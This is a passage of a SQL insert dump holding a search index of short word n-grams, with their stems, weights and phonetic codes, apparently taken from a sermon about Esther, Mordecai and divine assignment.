(327718, 'k2 item 62', 'k2 item 62', 0, 1, 1.3333, 'K350', 1, '*'),
(327719, 'keep god', 'keep god', 0, 1, 1.2667, 'K123', 1, '*'),
(327720, 'keep god does', 'keep god does', 0, 1, 1.4333, 'K1232', 1, '*'),
(327721, 'king to', 'king to', 0, 1, 1.2333, 'K523', 1, '*'),
(327722, 'king to counter', 'king to counter', 0, 1, 1.5, 'K5232536', 1, '*'),
(327723, 'king\'s palace', 'king palace', 0, 1, 1.4333, 'K52142', 1, '*'),
(327724, 'king\'s palace was', 'king palace was', 0, 1, 1.5667, 'K52142', 1, '*'),
(327725, 'kingdom settle', 'kingdom settle', 0, 1, 1.4667, 'K5235234', 1, '*'),
(327726, 'kingdom settle down', 'kingdom settle down', 0, 1, 1.6333, 'K523523435', 1, '*'),
(327727, 'know it was', 'know it was', 0, 1, 1.3667, 'K532', 1, '*'),
(327728, 'know that\'s', 'know that', 0, 1, 1.3667, 'K532', 1, '*'),
(327729, 'know that\'s crazy', 'know that crazy', 0, 1, 1.5667, 'K53262', 1, '*'),
(327730, 'know the assignment', 'know the assignment', 0, 1, 1.6333, 'K53253', 1, '*'),
(327731, 'know will have', 'know will have', 0, 1, 1.4667, 'K541', 1, '*'),
(327732, 'knowingly disobeyed', 'knowingli disobeyed', 0, 1, 1.6333, 'K5243213', 1, '*'),
(327733, 'knowingly disobeyed the', 'knowingli disobeyed the', 0, 1, 1.7667, 'K5243213', 1, '*'),
(327734, 'knowledge beyond', 'knowledg beyond', 0, 1, 1.5333, 'K5432153', 1, '*'),
(327735, 'knowledge beyond the', 'knowledg beyond the', 0, 1, 1.6667, 'K5432153', 1, '*'),
(327736, 'knowledge to', 'knowledg to', 0, 1, 1.4, 'K54323', 1, '*'),
(327737, 'knowledge to your', 'knowledg to your', 0, 1, 1.5667, 'K543236', 1, '*'),
(327738, 'knows whether', 'know whether', 0, 1, 1.4333, 'K5236', 1, '*'),
(327739, 'knows whether you', 'know whether you', 0, 1, 1.5667, 'K5236', 1, '*'),
(327740, 'labouring over', 'labour over', 0, 1, 1.4667, 'L165216', 1, '*'),
(327741, 'labouring over is', 'labour over is', 0, 1, 1.5667, 'L1652162', 1, '*'),
(327742, 'lady but', 'ladi but', 0, 1, 1.2667, 'L313', 1, '*'),
(327743, 'lady but if', 'ladi but if', 0, 1, 1.3667, 'L3131', 1, '*'),
(327744, 'land for', 'land for', 0, 1, 1.2667, 'L5316', 1, '*'),
(327745, 'land for her', 'land for her', 0, 1, 1.4, 'L5316', 1, '*'),
(327746, 'life belongs', 'life belongs', 0, 1, 1.4, 'L1452', 1, '*'),
(327747, 'life belongs to', 'life belongs to', 0, 1, 1.5, 'L14523', 1, '*'),
(327748, 'life comfortable', 'life comfortable', 0, 1, 1.5333, 'L12516314', 1, '*'),
(327749, 'life comfortable for', 'life comfortable for', 0, 1, 1.6667, 'L1251631416', 1, '*'),
(327750, 'life is how', 'life is how', 0, 1, 1.3667, 'L120', 1, '*'),
(327751, 'life of faith', 'life of faith', 0, 1, 1.4333, 'L130', 1, '*'),
(327752, 'life part', 'life part', 0, 1, 1.3, 'L163', 1, '*'),
(327753, 'life part 2', 'life part 2', 0, 1, 1.3667, 'L163', 1, '*'),
(327754, 'live the', 'live the', 0, 1, 1.2667, 'L130', 1, '*'),
(327755, 'live the life', 'live the life', 0, 1, 1.4333, 'L1341', 1, '*'),
(327756, 'living the divinely', 'live the divinely', 0, 1, 1.6333, 'L1523154', 1, '*'),
(327757, 'look at your', 'look at your', 0, 1, 1.4, 'L236', 1, '*'),
(327758, 'lord as your', 'lord as your', 0, 1, 1.4, 'L6326', 1, '*'),
(327759, 'low you', 'low you', 0, 1, 1.2333, 'L000', 1, '*'),
(327760, 'low you tend', 'low you tend', 0, 1, 1.4, 'L353', 1, '*'),
(327761, 'low you won\'t', 'low you won', 0, 1, 1.4333, 'L530', 1, '*'),
(327762, 'made different', 'made different', 0, 1, 1.4667, 'M31653', 1, '*'),
(327763, 'made different from', 'made different from', 0, 1, 1.6333, 'M31653165', 1, '*'),
(327764, 'made esther', 'made esther', 0, 1, 1.3667, 'M3236', 1, '*'),
(327765, 'made esther beautifully', 'made esther beautifully', 0, 1, 1.7667, 'M32361314', 1, '*'),
(327766, 'made you for', 'made you for', 0, 1, 1.4, 'M316', 1, '*'),
(327767, 'make your', 'make your', 0, 1, 1.3, 'M260', 1, '*'),
(327768, 'make your life', 'make your life', 0, 1, 1.4667, 'M2641', 1, '*'),
(327769, 'makes the', 'make the', 0, 1, 1.3, 'M230', 1, '*'),
(327770, 'makes the calling', 'make the calling', 0, 1, 1.5667, 'M232452', 1, '*'),
(327771, 'making you wealthy', 'make you wealthy', 0, 1, 1.6, 'M25243', 1, '*'),
(327772, 'manage', 'manag', 0, 0, 0.4, 'M200', 1, '*'),
(327773, 'manage those', 'manag those', 0, 1, 1.4, 'M232', 1, '*'),
(327774, 'manage those changes', 'manag those changes', 0, 1, 1.6667, 'M23252', 1, '*'),
(327775, 'marks', 'mark', 0, 0, 0.3333, 'M620', 1, '*'),
(327776, 'marks of', 'mark of', 0, 1, 1.2667, 'M621', 1, '*'),
(327777, 'marks of wisdom', 'mark of wisdom', 0, 1, 1.5, 'M621235', 1, '*'),
(327778, 'mary to', 'mari to', 0, 1, 1.2333, 'M630', 1, '*'),
(327779, 'mary to provide', 'mari to provide', 0, 1, 1.5, 'M631613', 1, '*'),
(327780, 'may be dormant', 'mai be dormant', 0, 1, 1.4667, 'M13653', 1, '*'),
(327781, 'may need more', 'mai need more', 0, 1, 1.4333, 'M356', 1, '*'),
(327782, 'maybe', 'mayb', 0, 0, 0.3333, 'M100', 1, '*'),
(327783, 'maybe you', 'mayb you', 0, 1, 1.3, 'M100', 1, '*'),
(327784, 'maybe you have', 'mayb you have', 0, 1, 1.4667, 'M100', 1, '*'),
(327785, 'me a helicopter', 'me a helicopter', 0, 1, 1.5, 'M42136', 1, '*'),
(327786, 'me and showed', 'me and showed', 0, 1, 1.4333, 'M323', 1, '*'),
(327787, 'me his', 'me his', 0, 1, 1.2, 'M200', 1, '*'),
(327788, 'me his plan', 'me his plan', 0, 1, 1.3667, 'M2145', 1, '*'),
(327789, 'me that', 'me that', 0, 1, 1.2333, 'M300', 1, '*'),
(327790, 'me that god', 'me that god', 0, 1, 1.3667, 'M323', 1, '*'),
(327791, 'me this is', 'me this is', 0, 1, 1.3333, 'M320', 1, '*'),
(327792, 'meaning to', 'mean to', 0, 1, 1.3333, 'M230', 1, '*'),
(327793, 'meaning to all', 'mean to all', 0, 1, 1.4667, 'M234', 1, '*'),
(327794, 'means you have', 'mean you have', 0, 1, 1.4667, 'M210', 1, '*'),
(327795, 'men that god', 'men that god', 0, 1, 1.4, 'M323', 1, '*'),
(327796, 'mentor', 'mentor', 0, 0, 0.4, 'M360', 1, '*'),
(327797, 'mentor you.”', 'mentor you.”', 0, 1, 1.4, 'M360', 1, '*'),
(327798, 'mentor you.” different', 'mentor you.” different', 0, 1, 1.7333, 'M3631653', 1, '*'),
(327799, 'minister a', 'minist a', 0, 1, 1.3333, 'M236', 1, '*'),
(327800, 'minister a senator', 'minist a senator', 0, 1, 1.6, 'M2362536', 1, '*'),
(327801, 'ministry of', 'ministri of', 0, 1, 1.3667, 'M2361', 1, '*'),
(327802, 'ministry of a', 'ministri of a', 0, 1, 1.4333, 'M2361', 1, '*'),
(327803, 'ministry requires', 'ministri requires', 0, 1, 1.5667, 'M236262', 1, '*'),
(327804, 'ministry requires a', 'ministri requires a', 0, 1, 1.6333, 'M236262', 1, '*'),
(327805, 'ministry secondly', 'ministri secondly', 0, 1, 1.5667, 'M2362534', 1, '*'),
(327806, 'ministry secondly i', 'ministri secondly i', 0, 1, 1.6333, 'M2362534', 1, '*'),
(327807, 'ministry she', 'ministri she', 0, 1, 1.4, 'M2362', 1, '*'),
(327808, 'ministry she said', 'ministri she said', 0, 1, 1.5667, 'M23623', 1, '*'),
(327809, 'miraculously', 'miracul', 0, 0, 0.8, 'M62424', 1, '*'),
(327810, 'miraculously for', 'miracul for', 0, 1, 1.5333, 'M6242416', 1, '*'),
(327811, 'miraculously for your', 'miracul for your', 0, 1, 1.7, 'M6242416', 1, '*'),
(327812, 'miss it', 'miss it', 0, 1, 1.2333, 'M230', 1, '*'),
(327813, 'miss it mordecai', 'miss it mordecai', 0, 1, 1.5333, 'M235632', 1, '*'),
(327814, 'miss the', 'miss the', 0, 1, 1.2667, 'M230', 1, '*'),
(327815, 'miss the purpose', 'miss the purpose', 0, 1, 1.5333, 'M231612', 1, '*'),
(327816, 'money from', 'monei from', 0, 1, 1.3333, 'M165', 1, '*'),
(327817, 'money from the', 'monei from the', 0, 1, 1.4667, 'M1653', 1, '*'),
(327818, 'money to pay', 'monei to pay', 0, 1, 1.4, 'M310', 1, '*'),
(327819, 'mordecai said', 'mordecai said', 0, 1, 1.4333, 'M6323', 1, '*'),
(327820, 'mordecai said “...', 'mordecai said “...', 0, 1, 1.6, 'M6323', 1, '*'),
(327821, 'mordecai told', 'mordecai told', 0, 1, 1.4333, 'M632343', 1, '*'),
(327822, 'mordecai told her', 'mordecai told her', 0, 1, 1.5667, 'M6323436', 1, '*'),
(327823, 'mordecai was', 'mordecai was', 0, 1, 1.4, 'M632', 1, '*'),
(327824, 'mordecai was in', 'mordecai was in', 0, 1, 1.5, 'M6325', 1, '*'),
(327825, 'more faith', 'more faith', 0, 1, 1.3333, 'M613', 1, '*'),
(327826, 'more faith or', 'more faith or', 0, 1, 1.4333, 'M6136', 1, '*'),
(327827, 'more wisdom', 'more wisdom', 0, 1, 1.3667, 'M6235', 1, '*'),
(327828, 'more wisdom somewhere', 'more wisdom somewhere', 0, 1, 1.7, 'M6235256', 1, '*'),
(327829, 'must know the', 'must know the', 0, 1, 1.4333, 'M23253', 1, '*'),
(327830, 'musthave', 'musthav', 0, 0, 0.5333, 'M231', 1, '*'),
(327831, 'musthave a', 'musthav a', 0, 1, 1.3333, 'M231', 1, '*'),
(327832, 'musthave a balanced', 'musthav a balanced', 0, 1, 1.6333, 'M2314523', 1, '*'),
(327833, 'my assignment', 'my assignment', 0, 1, 1.4333, 'M253', 1, '*'),
(327834, 'my assignment at', 'my assignment at', 0, 1, 1.5333, 'M253', 1, '*'),
(327835, 'my car', 'my car', 0, 1, 1.2, 'M260', 1, '*'),
(327836, 'my car and', 'my car and', 0, 1, 1.3333, 'M2653', 1, '*'),
(327837, 'my car to', 'my car to', 0, 1, 1.3, 'M263', 1, '*'),
(327838, 'my divine', 'my divine', 0, 1, 1.3, 'M315', 1, '*'),
(327839, 'my divine assignment', 'my divine assignment', 0, 1, 1.6667, 'M315253', 1, '*'),
(327840, 'my faith', 'my faith', 0, 1, 1.2667, 'M130', 1, '*'),
(327841, 'my faith to', 'my faith to', 0, 1, 1.3667, 'M130', 1, '*'),
(327842, 'my ministry', 'my ministry', 0, 1, 1.3667, 'M236', 1, '*'),
(327843, 'my ministry requires', 'my ministry requires', 0, 1, 1.6667, 'M236262', 1, '*'),
(327844, 'my ministry secondly', 'my ministry secondly', 0, 1, 1.6667, 'M2362534', 1, '*'),
(327845, 'need more', 'need more', 0, 1, 1.3, 'N356', 1, '*'),
(327846, 'need more faith', 'need more faith', 0, 1, 1.5, 'N35613', 1, '*'),
(327847, 'never been', 'never been', 0, 1, 1.3333, 'N1615', 1, '*'),
(327848, 'never been the', 'never been the', 0, 1, 1.4667, 'N16153', 1, '*'),
(327849, 'no divine', 'no divine', 0, 1, 1.3, 'N315', 1, '*'),
(327850, 'no divine commitment', 'no divine commitment', 0, 1, 1.6667, 'N31525353', 1, '*'),
(327851, 'not accidental', 'not accidental', 0, 1, 1.4667, 'N323534', 1, '*'),
(327852, 'not accidental it', 'not accidental it', 0, 1, 1.5667, 'N3235343', 1, '*'),
(327853, 'not be servicing', 'not be servicing', 0, 1, 1.5333, 'N31261252', 1, '*'),
(327854, 'not deliver', 'not deliver', 0, 1, 1.3667, 'N3416', 1, '*'),
(327855, 'not deliver israel', 'not deliver israel', 0, 1, 1.6, 'N3416264', 1, '*'),
(327856, 'not every born', 'not every born', 0, 1, 1.4667, 'N316165', 1, '*'),
(327857, 'not have but', 'not have but', 0, 1, 1.4, 'N313', 1, '*'),
(327858, 'not have to', 'not have to', 0, 1, 1.3667, 'N313', 1, '*'),
(327859, 'not just interested', 'not just interested', 0, 1, 1.6333, 'N32353623', 1, '*'),
(327860, 'not knowingly', 'not knowingly', 0, 1, 1.4333, 'N32524', 1, '*'),
(327861, 'not knowingly disobeyed', 'not knowingly disobeyed', 0, 1, 1.7667, 'N325243213', 1, '*'),
(327862, 'not require', 'not require', 0, 1, 1.3667, 'N3626', 1, '*'),
(327863, 'not require a', 'not require a', 0, 1, 1.4333, 'N3626', 1, '*'),
(327864, 'not see', 'not see', 0, 1, 1.2333, 'N320', 1, '*'),
(327865, 'not see will', 'not see will', 0, 1, 1.4, 'N324', 1, '*'),
(327866, 'not sure that', 'not sure that', 0, 1, 1.4333, 'N3263', 1, '*'),
(327867, 'not the same', 'not the same', 0, 1, 1.4, 'N325', 1, '*'),
(327868, 'now for', 'now for', 0, 1, 1.2333, 'N160', 1, '*'),
(327869, 'now for 35', 'now for 35', 0, 1, 1.3333, 'N160', 1, '*'),
(327870, 'nti', 'nti', 0, 0, 0.2, 'N300', 1, '*'),
(327871, 'nti f', 'nti f', 0, 1, 1.1667, 'N310', 1, '*'),
(327872, 'nti f y', 'nti f y', 0, 1, 1.2333, 'N310', 1, '*'),
(327873, 'nurture', 'nurtur', 0, 0, 0.4667, 'N636', 1, '*'),
(327874, 'nurture and', 'nurtur and', 0, 1, 1.3667, 'N63653', 1, '*'),
(327875, 'nurture and service', 'nurtur and service', 0, 1, 1.6333, 'N636532612', 1, '*'),
(327876, 'o bedience', 'o bedience', 0, 1, 1.3333, 'O1352', 1, '*'),
(327877, 'o bedience account', 'o bedience account', 0, 1, 1.6, 'O135253', 1, '*'),
(327878, 'o keep', 'o keep', 0, 1, 1.2, 'O210', 1, '*'),
(327879, 'o keep god', 'o keep god', 0, 1, 1.3333, 'O2123', 1, '*'),
(327880, 'obedience and', 'obedi and', 0, 1, 1.4333, 'O135253', 1, '*'),
(327881, 'obedience and disobedience', 'obedi and disobedience', 0, 1, 1.8667, 'O13525321352', 1, '*'),
(327882, 'obedience of', 'obedi of', 0, 1, 1.4, 'O13521', 1, '*'),
(327883, 'obedience of jesus', 'obedi of jesus', 0, 1, 1.6, 'O135212', 1, '*'),
(327884, 'obeyed all our', 'obei all our', 0, 1, 1.4667, 'O1346', 1, '*'),
(327885, 'of a foolish', 'of a foolish', 0, 1, 1.4, 'O142', 1, '*'),
(327886, 'of a prophet', 'of a prophet', 0, 1, 1.4, 'O1613', 1, '*'),
(327887, 'of esther', 'of esther', 0, 1, 1.3, 'O1236', 1, '*'),
(327888, 'of esther 4', 'of esther 4', 0, 1, 1.3667, 'O1236', 1, '*'),
(327889, 'of faith understand', 'of faith understand', 0, 1, 1.6333, 'O135362353', 1, '*'),
(327890, 'of god except', 'of god except', 0, 1, 1.4333, 'O123213', 1, '*'),
(327891, 'of her time', 'of her time', 0, 1, 1.3667, 'O1635', 1, '*'),
(327892, 'of our faith', 'of our faith', 0, 1, 1.4, 'O1613', 1, '*'),
(327893, 'of persia', 'of persia', 0, 1, 1.3, 'O162', 1, '*'),
(327894, 'of persia and', 'of persia and', 0, 1, 1.4333, 'O16253', 1, '*'),
(327895, 'of the accounts', 'of the accounts', 0, 1, 1.5, 'O132532', 1, '*'),
(327896, 'of the jewish', 'of the jewish', 0, 1, 1.4333, 'O132', 1, '*'),
(327897, 'of the marks', 'of the marks', 0, 1, 1.4, 'O13562', 1, '*'),
(327898, 'of the obedience', 'of the obedience', 0, 1, 1.5333, 'O131352', 1, '*'),
(327899, 'of the pilot', 'of the pilot', 0, 1, 1.4, 'O13143', 1, '*'),
(327900, 'of these three', 'of these three', 0, 1, 1.4667, 'O13236', 1, '*'),
(327901, 'of what god', 'of what god', 0, 1, 1.3667, 'O1323', 1, '*'),
(327902, 'of wisdom', 'of wisdom', 0, 1, 1.3, 'O1235', 1, '*'),
(327903, 'of wisdom that', 'of wisdom that', 0, 1, 1.4667, 'O12353', 1, '*'),
(327904, 'official', 'offici', 0, 0, 0.5333, 'O124', 1, '*'),
(327905, 'official capacity', 'offici capacity', 0, 1, 1.5667, 'O1242123', 1, '*'),
(327906, 'official capacity that', 'offici capacity that', 0, 1, 1.7333, 'O1242123', 1, '*'),
(327907, 'official duty', 'offici duty', 0, 1, 1.4333, 'O1243', 1, '*'),
(327908, 'official duty don\'t', 'offici duty don', 0, 1, 1.6333, 'O124353', 1, '*'),
(327909, 'old testament and', 'old testament and', 0, 1, 1.5667, 'O43235353', 1, '*'),
(327910, 'on earth we', 'on earth we', 0, 1, 1.3667, 'O563', 1, '*'),
(327911, 'on foot', 'on foot', 0, 1, 1.2333, 'O513', 1, '*'),
(327912, 'on foot how', 'on foot how', 0, 1, 1.3667, 'O513', 1, '*'),
(327913, 'on official', 'on official', 0, 1, 1.3667, 'O5124', 1, '*'),
(327914, 'on official duty', 'on official duty', 0, 1, 1.5333, 'O51243', 1, '*'),
(327915, 'on the lord', 'on the lord', 0, 1, 1.3667, 'O53463', 1, '*'),
(327916, 'on your behalf', 'on your behalf', 0, 1, 1.4667, 'O56141', 1, '*'),
(327917, 'once he', 'onc he', 0, 1, 1.2333, 'O520', 1, '*'),
(327918, 'once he tells', 'onc he tells', 0, 1, 1.4333, 'O52342', 1, '*'),
(327919, 'once told', 'onc told', 0, 1, 1.3, 'O52343', 1, '*'),
(327920, 'once told me', 'onc told me', 0, 1, 1.4, 'O523435', 1, '*'),
(327921, 'once you find', 'onc you find', 0, 1, 1.4333, 'O52153', 1, '*'),
(327922, 'one another', 'on another', 0, 1, 1.3667, 'O536', 1, '*'),
(327923, 'one another but', 'on another but', 0, 1, 1.5, 'O53613', 1, '*'),
(327924, 'one i\'m', 'on i', 0, 1, 1.2333, 'O500', 1, '*'),
(327925, 'one i\'m not', 'on i not', 0, 1, 1.3667, 'O530', 1, '*'),
(327926, 'one of these', 'on of these', 0, 1, 1.4, 'O5132', 1, '*'),
(327927, 'one whatever', 'on whatever', 0, 1, 1.4, 'O5316', 1, '*'),
(327928, 'one whatever your', 'on whatever your', 0, 1, 1.5667, 'O5316', 1, '*'),
(327929, 'opened angels', 'open angels', 0, 1, 1.4333, 'O1535242', 1, '*'),
(327930, 'opened angels are', 'open angels are', 0, 1, 1.5667, 'O15352426', 1, '*'),
(327931, 'opened on', 'open on', 0, 1, 1.3, 'O1535', 1, '*'),
(327932, 'opened on your', 'open on your', 0, 1, 1.4667, 'O15356', 1, '*'),
(327933, 'operated', 'oper', 0, 0, 0.5333, 'O163', 1, '*'),
(327934, 'operated these', 'oper these', 0, 1, 1.4667, 'O1632', 1, '*'),
(327935, 'operated these account', 'oper these account', 0, 1, 1.7333, 'O163253', 1, '*'),
(327936, 'or a housewife', 'or a housewife', 0, 1, 1.4667, 'O621', 1, '*'),
(327937, 'or big', 'or big', 0, 1, 1.2, 'O612', 1, '*'),
(327938, 'or big ability', 'or big ability', 0, 1, 1.4667, 'O612143', 1, '*'),
(327939, 'or more wisdom', 'or more wisdom', 0, 1, 1.4667, 'O656235', 1, '*'),
(327940, 'or the feebleness', 'or the feebleness', 0, 1, 1.5667, 'O631452', 1, '*'),
(327941, 'ordered', 'order', 0, 0, 0.4667, 'O6363', 1, '*'),
(327942, 'ordered that', 'order that', 0, 1, 1.4, 'O6363', 1, '*'),
(327943, 'ordered that i', 'order that i', 0, 1, 1.4667, 'O6363', 1, '*'),
(327944, 'other girl', 'other girl', 0, 1, 1.3333, 'O36264', 1, '*'),
(327945, 'other girl of', 'other girl of', 0, 1, 1.4333, 'O362641', 1, '*'),
(327946, 'our faith or', 'our faith or', 0, 1, 1.4, 'O6136', 1, '*'),
(327947, 'our faith you', 'our faith you', 0, 1, 1.4333, 'O613', 1, '*'),
(327948, 'our salvation', 'our salvation', 0, 1, 1.4333, 'O624135', 1, '*'),
(327949, 'our salvation is', 'our salvation is', 0, 1, 1.5333, 'O6241352', 1, '*'),
(327950, 'over is', 'over is', 0, 1, 1.2333, 'O162', 1, '*'),
(327951, 'over is my', 'over is my', 0, 1, 1.3333, 'O1625', 1, '*'),
(327952, 'p', 'p', 0, 0, 0.0667, 'P000', 1, '*'),
(327953, 'p account', 'p account', 0, 1, 1.3, 'P253', 1, '*'),
(327954, 'p account one', 'p account one', 0, 1, 1.4333, 'P2535', 1, '*'),
(327955, 'palace', 'palac', 0, 0, 0.4, 'P420', 1, '*'),
(327956, 'palace was', 'palac was', 0, 1, 1.3333, 'P420', 1, '*'),
(327957, 'palace was not', 'palac was not', 0, 1, 1.4667, 'P4253', 1, '*'),
(327958, 'park', 'park', 0, 0, 0.2667, 'P620', 1, '*'),
(327959, 'park the', 'park the', 0, 1, 1.2667, 'P623', 1, '*'),
(327960, 'park the helicopter', 'park the helicopter', 0, 1, 1.6333, 'P62342136', 1, '*'),
(327961, 'past to', 'past to', 0, 1, 1.2333, 'P230', 1, '*'),
(327962, 'past to today', 'past to today', 0, 1, 1.4333, 'P230', 1, '*'),
(327963, 'path for', 'path for', 0, 1, 1.2667, 'P316', 1, '*'),
(327964, 'path for different', 'path for different', 0, 1, 1.6, 'P31631653', 1, '*'),
(327965, 'pay the', 'pai the', 0, 1, 1.2333, 'P300', 1, '*'),
(327966, 'pay the salary', 'pai the salary', 0, 1, 1.4667, 'P3246', 1, '*'),
(327967, 'people and problems', 'peopl and problems', 0, 1, 1.6333, 'P453161452', 1, '*'),
(327968, 'people get', 'peopl get', 0, 1, 1.3333, 'P423', 1, '*'),
(327969, 'people get to', 'peopl get to', 0, 1, 1.4333, 'P423', 1, '*'),
(327970, 'people it', 'peopl it', 0, 1, 1.3, 'P430', 1, '*'),
(327971, 'people it is', 'peopl it is', 0, 1, 1.4, 'P432', 1, '*'),
(327972, 'people that belong', 'peopl that belong', 0, 1, 1.6, 'P431452', 1, '*'),
(327973, 'people think', 'peopl think', 0, 1, 1.4, 'P4352', 1, '*'),
(327974, 'people think that', 'peopl think that', 0, 1, 1.5667, 'P43523', 1, '*'),
(327975, 'people\'s life', 'peopl life', 0, 1, 1.4333, 'P4241', 1, '*'),
(327976, 'people\'s life is', 'peopl life is', 0, 1, 1.5333, 'P42412', 1, '*'),
(327977, 'periods yesterday', 'period yesterday', 0, 1, 1.5667, 'P632363', 1, '*'),
(327978, 'periods yesterday today', 'period yesterday today', 0, 1, 1.7667, 'P632363', 1, '*'),
(327979, 'persia', 'persia', 0, 0, 0.4, 'P620', 1, '*'),
(327980, 'persia and', 'persia and', 0, 1, 1.3333, 'P6253', 1, '*'),
(327981, 'persia and not', 'persia and not', 0, 1, 1.4667, 'P625353', 1, '*'),
(327982, 'person is wise', 'person is wise', 0, 1, 1.4667, 'P6252', 1, '*'),
(327983, 'person that you', 'person that you', 0, 1, 1.5, 'P6253', 1, '*'),
(327984, 'pilot', 'pilot', 0, 0, 0.3333, 'P430', 1, '*'),
(327985, 'pilot and', 'pilot and', 0, 1, 1.3, 'P4353', 1, '*'),
(327986, 'pilot and where', 'pilot and where', 0, 1, 1.5, 'P43536', 1, '*'),
(327987, 'place and you', 'place and you', 0, 1, 1.4333, 'P4253', 1, '*'),
(327988, 'place correctly', 'place correctly', 0, 1, 1.5, 'P426234', 1, '*'),
(327989, 'place correctly and', 'place correctly and', 0, 1, 1.6333, 'P42623453', 1, '*'),
(327990, 'place of destiny', 'place of destiny', 0, 1, 1.5333, 'P4213235', 1, '*'),
(327991, 'plan for me', 'plan for me', 0, 1, 1.3667, 'P45165', 1, '*'),
(327992, 'planned', 'plan', 0, 0, 0.4667, 'P453', 1, '*'),
(327993, 'planned for', 'plan for', 0, 1, 1.3667, 'P45316', 1, '*'),
(327994, 'planned for you', 'plan for you', 0, 1, 1.5, 'P45316', 1, '*'),
(327995, 'plot', 'plot', 0, 0, 0.2667, 'P430', 1, '*'),
(327996, 'plot and', 'plot and', 0, 1, 1.2667, 'P4353', 1, '*'),
(327997, 'plot and facilitate', 'plot and facilitate', 0, 1, 1.6333, 'P43531243', 1, '*'),
(327998, 'prepared for this', 'prepar for this', 0, 1, 1.5667, 'P61631632', 1, '*'),
(327999, 'president', 'presid', 0, 0, 0.6, 'P62353', 1, '*'),
(328000, 'president a', 'presid a', 0, 1, 1.3667, 'P62353', 1, '*'),
(328001, 'president a prime', 'presid a prime', 0, 1, 1.5667, 'P62353165', 1, '*'),
(328002, 'prime minister a', 'prime minister a', 0, 1, 1.5333, 'P65236', 1, '*'),
(328003, 'problem of', 'problem of', 0, 1, 1.3333, 'P61451', 1, '*'),
(328004, 'problem of god\'s', 'problem of god', 0, 1, 1.5333, 'P61451232', 1, '*'),
(328005, 'problem really', 'problem really', 0, 1, 1.4667, 'P614564', 1, '*'),
(328006, 'problem really you', 'problem really you', 0, 1, 1.6, 'P614564', 1, '*'),
(328007, 'problems you', 'problem you', 0, 1, 1.4, 'P61452', 1, '*'),
(328008, 'problems you see', 'problem you see', 0, 1, 1.5333, 'P61452', 1, '*'),
(328009, 'process of', 'process of', 0, 1, 1.3333, 'P621', 1, '*'),
(328010, 'process of god', 'process of god', 0, 1, 1.4667, 'P62123', 1, '*'),
(328011, 'professional', 'profession', 0, 0, 0.8, 'P61254', 1, '*'),
(328012, 'professional that', 'profession that', 0, 1, 1.5667, 'P612543', 1, '*'),
(328013, 'professional that is', 'profession that is', 0, 1, 1.6667, 'P6125432', 1, '*'),
(328014, 'promote you', 'promot you', 0, 1, 1.3667, 'P653', 1, '*'),
(328015, 'promote you at', 'promot you at', 0, 1, 1.4667, 'P653', 1, '*'),
(328016, 'prophet under', 'prophet under', 0, 1, 1.4333, 'P613536', 1, '*'),
(328017, 'prophet under the', 'prophet under the', 0, 1, 1.5667, 'P6135363', 1, '*'),
(328018, 'provide a', 'provid a', 0, 1, 1.3, 'P613', 1, '*'),
(328019, 'provide a home', 'provid a home', 0, 1, 1.4667, 'P6135', 1, '*'),
(328020, 'provide a womb', 'provid a womb', 0, 1, 1.4667, 'P61351', 1, '*'),
(328021, 'provision for your', 'provis for your', 0, 1, 1.6, 'P612516', 1, '*'),
(328022, 'purpose for', 'purpos for', 0, 1, 1.3667, 'P61216', 1, '*'),
(328023, 'purpose for my', 'purpos for my', 0, 1, 1.4667, 'P612165', 1, '*'),
(328024, 'purpose for the', 'purpos for the', 0, 1, 1.5, 'P612163', 1, '*'),
(328025, 'purpose if', 'purpos if', 0, 1, 1.3333, 'P6121', 1, '*'),
(328026, 'purpose if god', 'purpos if god', 0, 1, 1.4667, 'P612123', 1, '*'),
(328027, 'purposeful', 'purpos', 0, 0, 0.6667, 'P61214', 1, '*'),
(328028, 'purposeful timed', 'purpos timed', 0, 1, 1.5333, 'P61214353', 1, '*'),
(328029, 'purposeful timed designed', 'purpos timed designed', 0, 1, 1.8333, 'P61214353253', 1, '*'),
(328030, 'purposes there', 'purpos there', 0, 1, 1.4667, 'P61236', 1, '*'),
(328031, 'purposes there once', 'purpos there once', 0, 1, 1.6333, 'P6123652', 1, '*'),
(328032, 'put esther', 'put esther', 0, 1, 1.3333, 'P3236', 1, '*'),
(328033, 'put esther there', 'put esther there', 0, 1, 1.5333, 'P323636', 1, '*'),
(328034, 'put you', 'put you', 0, 1, 1.2333, 'P300', 1, '*'),
(328035, 'put you in', 'put you in', 0, 1, 1.3333, 'P350', 1, '*'),
(328036, 'queen of', 'queen of', 0, 1, 1.2667, 'Q510', 1, '*'),
(328037, 'queen of persia', 'queen of persia', 0, 1, 1.5, 'Q5162', 1, '*'),
(328038, 'queen so', 'queen so', 0, 1, 1.2667, 'Q520', 1, '*'),
(328039, 'queen so as', 'queen so as', 0, 1, 1.3667, 'Q520', 1, '*'),
(328040, 'raised him her', 'rais him her', 0, 1, 1.4667, 'R2356', 1, '*'),
(328041, 'really you', 'realli you', 0, 1, 1.3333, 'R400', 1, '*'),
(328042, 'really you may', 'realli you may', 0, 1, 1.4667, 'R450', 1, '*'),
(328043, 'reason why your', 'reason why your', 0, 1, 1.5, 'R256', 1, '*'),
(328044, 'reasons', 'reason', 0, 0, 0.4667, 'R252', 1, '*'),
(328045, 'reasons and', 'reason and', 0, 1, 1.3667, 'R25253', 1, '*'),
(328046, 'reasons and you', 'reason and you', 0, 1, 1.5, 'R25253', 1, '*'),
(328047, 'recognize the people', 'recogn the people', 0, 1, 1.6667, 'R252314', 1, '*'),
(328048, 'recognizecritical', 'recognizecrit', 0, 0, 1, 'R2526324', 1, '*'),
(328049, 'recognizecritical relationships', 'recognizecrit relationships', 0, 1, 2, 'R25263246435212', 1, '*'),
(328050, 'recognizecritical relationships whether', 'recognizecrit relationships whether', 0, 1, 2, 'R2526324643521236', 1, '*'),
(328051, 'recording', 'record', 0, 0, 0.6, 'R26352', 1, '*'),
(328052, 'recording god', 'record god', 0, 1, 1.4333, 'R263523', 1, '*'),
(328053, 'recording god is', 'record god is', 0, 1, 1.5333, 'R2635232', 1, '*'),
(328054, 'rela', 'rela', 0, 0, 0.2667, 'R400', 1, '*'),
(328055, 'rela t', 'rela t', 0, 1, 1.2, 'R430', 1, '*'),
(328056, 'rela t ionshi', 'rela t ionshi', 0, 1, 1.4333, 'R4352', 1, '*'),
(328057, 'relationships because', 'relationship because', 0, 1, 1.7, 'R43521212', 1, '*'),
(328058, 'relationships because there', 'relationship because there', 0, 1, 1.9, 'R4352121236', 1, '*'),
(328059, 'relationships in their', 'relationship in their', 0, 1, 1.7333, 'R435212536', 1, '*'),
(328060, 'relationships whether', 'relationship whether', 0, 1, 1.7, 'R43521236', 1, '*'),
